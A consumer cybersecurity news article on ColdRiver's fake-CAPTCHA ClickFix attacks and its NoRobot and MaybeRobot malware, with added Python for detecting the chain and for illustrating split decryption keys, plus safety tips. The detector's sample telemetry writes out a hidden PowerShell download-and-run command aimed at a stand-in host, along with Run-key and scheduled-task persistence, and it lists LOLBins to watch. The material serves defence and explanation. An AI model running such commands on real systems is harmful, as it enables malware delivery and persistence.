Russian hackers use fake CAPTCHA tests to spread new malware families to multiple targets

Russian state-backed hackers have stepped up their game with new malware families hidden behind fake CAPTCHA tests. The group, tracked as Star Blizzard or ColdRiver, now uses ClickFix attacks to trick people into running malware disguised as a simple “I’m not a robot” check.

These attacks represent a new wave of cyber deception, targeting governments, journalists and NGOs with malware that changes faster than researchers can analyze.

The ClickFix trap: a new type of social engineering

Google’s Threat Intelligence Group (GTIG) first observed hackers using the LostKeys malware in espionage operations. Once exposed by researchers, the attackers quickly changed course, abandoning LostKeys within a week and implementing new tools: NoRobot, YesRobot, and MaybeRobot.

The ClickFix attack works like this: a victim lands on a fake CAPTCHA page that looks identical to the real one. Instead of a checkbox, the page tells the visitor to prove they are human by pasting a command it has silently placed on the clipboard into the Windows Run dialog and pressing Enter. That command, executed by the user rather than by any browser exploit, fetches and launches NoRobot, which infects the computer and establishes persistence through registry changes and scheduled tasks.

Inside the Russian “robot” malware chain

Russian hackers built their latest attack around a chain of connected malware families that unfold step by step once a victim clicks on the fake CAPTCHA.

NoRobot: the entry point

NoRobot is the first stage of the infection. It prepares the environment by downloading additional files, modifying registry keys, and creating scheduled tasks so the implant stays active even after a reboot.
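The chain described above (a command pasted from a fake CAPTCHA page, then registry and scheduled-task persistence) is what a detection engineer would hunt for in process-creation and registry telemetry. The following Python is an added example, not code from GTIG or from this article. It runs over a handful of constructed Sysmon-style events; the paths, task name and the captcha-check.invalid URL are invented for illustration, and the indicators are generic ClickFix tells (a LOLBin spawned directly by explorer.exe with a URL, hidden window or encoded command, followed by a Run-key write or schtasks /create), not signatures for NoRobot itself.

```python
import re
from dataclasses import dataclass

# Living-off-the-land binaries commonly launched from the Run dialog in ClickFix chains.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe",
           "cmd.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://\S+", re.I)
ENCODED_RE = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(?:Run|RunOnce)\\", re.I)


@dataclass
class Event:
    event_id: int            # Sysmon IDs: 1 = process create, 13 = registry value set
    image: str = ""
    parent_image: str = ""
    command_line: str = ""
    target_object: str = ""  # registry path for event 13


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def process_indicators(e: Event) -> list:
    """Indicator names for one process-creation event (empty list = nothing suspicious)."""
    hits = []
    if e.event_id != 1:
        return hits
    img, cmd = basename(e.image), e.command_line
    run_dialog = basename(e.parent_image) == "explorer.exe"  # Win+R children are explorer's
    if img in LOLBINS and run_dialog and (
            URL_RE.search(cmd) or ENCODED_RE.search(cmd) or HIDDEN_RE.search(cmd)):
        hits.append("clickfix_run_dialog")
    if HIDDEN_RE.search(cmd):
        hits.append("hidden_window")
    if ENCODED_RE.search(cmd):
        hits.append("encoded_command")
    if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        hits.append("persistence_scheduled_task")
    return hits


def registry_indicators(e: Event) -> list:
    if e.event_id == 13 and RUN_KEY_RE.search(e.target_object):
        return ["persistence_run_key"]
    return []


def analyze(events: list) -> dict:
    """Map indicator name -> indices of the events that triggered it."""
    found = {}
    for i, e in enumerate(events):
        for name in process_indicators(e) + registry_indicators(e):
            found.setdefault(name, []).append(i)
    return found


def is_clickfix_chain(events: list) -> bool:
    """True when a Run-dialog launch is later followed by any persistence indicator."""
    found = analyze(events)
    if "clickfix_run_dialog" not in found:
        return False
    first = min(found["clickfix_run_dialog"])
    persistence = found.get("persistence_run_key", []) + found.get("persistence_scheduled_task", [])
    return any(i > first for i in persistence)


# Constructed sample telemetry (not real logs): one ClickFix chain plus a benign browser launch.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    Event(1, PS, r"C:\Windows\explorer.exe",
          'powershell -w hidden -c "iwr http://captcha-check.invalid/v.dll -o $env:TEMP\\v.dll; '
          'rundll32 $env:TEMP\\v.dll,Start"'),
    Event(1, r"C:\Windows\System32\rundll32.exe", PS,
          r"rundll32 C:\Users\u\AppData\Local\Temp\v.dll,Start"),
    Event(13, r"C:\Windows\System32\rundll32.exe",
          target_object=r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event(1, r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\rundll32.exe",
          r'schtasks /create /sc onlogon /tn Updater /tr "rundll32 C:\Users\u\AppData\Local\Temp\v.dll,Start"'),
    Event(1, r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\explorer.exe",
          "chrome.exe https://example.com/"),
]

if __name__ == "__main__":
    for name, idx in analyze(SAMPLE_EVENTS).items():
        print(f"{name}: events {idx}")
    print("ClickFix chain:", is_clickfix_chain(SAMPLE_EVENTS))
```

The parent-is-explorer.exe condition is the cheap, high-signal part: commands typed into Win+R are children of the shell, whereas scripted PowerShell from an admin tool or a scheduler usually is not. Tune the LOLBin list and the URL/encoding checks to your environment before alerting on them.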

YesRobot: the brief experiment

Hackers briefly tested YesRobot, a Python-based backdoor, but quickly abandoned it after realizing that the full Python installation it required drew unwanted attention from defenders.

MaybeRobot: the new weapon

MaybeRobot replaced YesRobot as a stealthier PowerShell-based tool. It can download and execute payloads, run arbitrary commands, and send stolen data back to the attackers. Researchers say MaybeRobot development has now stabilized, which lets the group concentrate on making NoRobot harder to detect.

How these attacks continue to evolve

Security analysts noted that the malware delivery chain has changed several times. At one point, it was “drastically simplified,” only to become complex again when attackers began splitting cryptographic keys across multiple files. This strategy makes it difficult for researchers to reconstruct how infections work. Without each piece of the puzzle, the final malware payload cannot be correctly decrypted.
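To see why splitting a decryption key across several files frustrates analysis, here is an added illustration in Python. It is not ColdRiver's actual scheme (which this article does not describe) and not code from the researchers' report: the key is XOR-split into one share per dropped file, and the payload is encrypted under the combined key with an HMAC-SHA256 counter keystream, chosen only to stay stdlib-only where a real loader would more likely use AES. The file names and payload bytes are invented.

```python
import hashlib
import hmac
import secrets


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def split_key(key: bytes, n: int) -> list:
    """XOR secret sharing: n-1 random shares plus one chosen so all n XOR back to the key.
    Any n-1 shares are statistically independent of the key, so a partial collection is useless."""
    shares = [secrets.token_bytes(len(key)) for _ in range(n - 1)]
    last = key
    for s in shares:
        last = xor_bytes(last, s)
    return shares + [last]


def combine_key(shares: list) -> bytes:
    key = bytes(len(shares[0]))
    for s in shares:
        key = xor_bytes(key, s)
    return key


def keystream(key: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode; a stand-in for a real cipher (illustration only)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(key: bytes, data: bytes) -> bytes:
    return xor_bytes(data, keystream(key, len(data)))  # XOR stream: the same call decrypts


def stage_payload(payload: bytes, key: bytes) -> dict:
    """Model the drop: three (invented) files each carry one share, a fourth the ciphertext."""
    s1, s2, s3 = split_key(key, 3)
    return {"stage1.dll": s1, "config.dat": s2, "update.bin": s3,
            "payload.enc": encrypt(key, payload)}


def recover_payload(artifacts: dict) -> bytes:
    """The analyst's step: combine whatever share-bearing files were collected and decrypt."""
    shares = [v for name, v in artifacts.items() if name != "payload.enc"]
    return encrypt(combine_key(shares), artifacts["payload.enc"])


# Constructed demo inputs (not real malware material).
DEMO_KEY = bytes(range(32))
DEMO_PAYLOAD = b"MZ\x90\x00constructed-final-stage-bytes"


def demo() -> tuple:
    """Returns (decrypts with all files, decrypts with one file missing)."""
    artifacts = stage_payload(DEMO_PAYLOAD, DEMO_KEY)
    full = recover_payload(artifacts) == DEMO_PAYLOAD
    partial = dict(artifacts)
    del partial["config.dat"]          # one dropped file never made it into the sample set
    missing_one = recover_payload(partial) == DEMO_PAYLOAD
    return full, missing_one


if __name__ == "__main__":
    print("all files:", demo()[0], "| one file missing:", demo()[1])
```

The practical consequence for responders is that a single file pulled from a sandbox or an endpoint is not enough: collect every artifact the first stage writes, in the same run, or the decryption key cannot be rebuilt.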

Who is targeted by Russian malware?

ColdRiver’s operations have been linked to the Russian intelligence service (FSB), with years of activity focused on espionage and data theft. The group has systematically attacked Western governments, think tanks, media organizations and NGOs to steal sensitive information and gain strategic insights.

Despite sanctions, infrastructure takedowns and public exposure, the group keeps evolving. Its quick shift from LostKeys to NoRobot and MaybeRobot shows a highly organized and well-funded operation capable of retooling in a matter of days.

Even if you are not a government or corporate target, these evolving attacks serve as a reminder that anyone connected to the Internet is at some level of risk. Compromised personal accounts, reused passwords, or infected email attachments can make everyday users an easy entry point for larger campaigns.

While these threats may aim high, their reach extends far and wide. Awareness and cautious behavior online are essential for everyone.

How to stay safe from Russian malware hidden in fake CAPTCHAs

These practical steps can help you protect your data and devices from the growing wave of Russian malware that uses fake CAPTCHA pages to spread.

1) Beware of unexpected CAPTCHA challenges

Fake “I’m not a robot” pages are the lure in this campaign. A real CAPTCHA never asks you to open the Run dialog, a terminal or PowerShell, or to paste a command; any “verification” step that does is the attack itself. If you are redirected to a CAPTCHA on an unknown site or after clicking a suspicious link, stop, close the page, and check the URL before taking any action.

2) Use powerful antivirus software

Choose reliable antivirus protection that not only scans for known malware but also monitors for suspicious behavior. Because “Robot” malware evolves rapidly, behavior-based detection helps stop new variants before signature updates are available. Enable automatic updates and schedule daily scans to detect infections early. The best way to protect yourself from malicious links that install malware and potentially access your private information is to have powerful antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

3) Consider a data deletion service to reduce exposure

Many cyberattacks start with publicly available data. Using a data removal or privacy protection service helps remove your personal information from data broker sites. By reducing what hackers can find online, it becomes more difficult for them to personalize phishing emails or social engineering traps that lead to malware infection.

While no service can guarantee complete removal of your data from the Internet, a data deletion service is truly a smart choice. They are not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to delete your personal data from the Internet. By limiting the information available, you reduce the risk of scammers cross-referencing leaked data with information they can find on the dark web, making it harder for them to target you.

4) Keep software and operating systems updated

The ClickFix chain described here does not need a software vulnerability at all; it needs a user to run a command. Patching still matters, because follow-on stages and plenty of other malware do rely on known, unpatched flaws. Always apply updates as soon as they are released, and turn on automatic updates for your browser, antivirus and operating system. Outdated software remains one of the easiest entry points for Russian hackers and other advanced groups.

5) Use multi-factor authentication (MFA) whenever possible

Even if a hacker steals credentials through malware or phishing, multi-factor authentication adds another layer of protection. Require it for email, VPN, and cloud services. This simple step blocks most unauthorized access attempts that rely on a stolen password alone.

6) Back up data regularly

This campaign is about espionage, but a destructive or ransomware payload could be the next evolution of the same delivery chain. Back up critical data to an external drive and to cloud storage so that a clean copy exists if a device has to be wiped.

Kurt’s Key Takeaways

The rise of these Russian malware campaigns is a reminder that cybercriminals are always looking for the next trick. What seems like a harmless “I’m not a robot” check may actually hide a serious threat. Protecting yourself is not just about having antivirus software; it’s about being alert to the little details online that can make a big difference. Keep your devices up to date, question unexpected pop-ups, never paste a command a web page hands you, and use trusted tools to protect your personal information. With a little caution and consistency, you can outwit even the most devious attacks.

Copyright 2025 CyberGuy.com. All rights reserved.

Kurt “CyberGuy” Knutsson is an award-winning technology journalist with a deep love for technology, gear and gadgets that improve lives with his contributions to News and News Business since mornings on “News & Friends.” Do you have any technical questions? Get Kurt’s free CyberGuy newsletter, share your voice, a story idea or comment on CyberGuy.com.